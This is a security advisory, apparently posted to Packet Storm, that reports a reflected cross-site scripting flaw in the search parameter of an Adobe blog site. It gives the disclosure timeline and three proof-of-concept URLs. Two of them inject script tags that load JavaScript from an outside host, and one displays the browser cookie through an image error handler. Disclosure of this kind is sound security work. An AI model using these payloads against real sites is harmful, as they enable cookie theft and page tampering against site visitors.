----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor : Adobe Systems Incorporated (http://www.adobe.com)
Description : The search function of experiencedelivers.adobe.com reflects the `query` parameter into the page without output encoding, making the site vulnerable to reflected Cross-site Scripting attacks
Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
  (Adobe PSIRT has not responded to any requests after 09-Nov-2012)
- Packet Storm advisory : 19-Jan-2013
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function (the `query` request parameter)
Test #1: Remote JavaScript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8
Test #2: Remote JavaScript execution: overwrite HTML content (PoC)
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8
Test #3: Alert test with image tag (onerror handler displays the cookie, no external script needed)
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8
Note: the JavaScript test cases are not malicious; the external scripts are hosted on the researcher's own project site (idash.net).
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------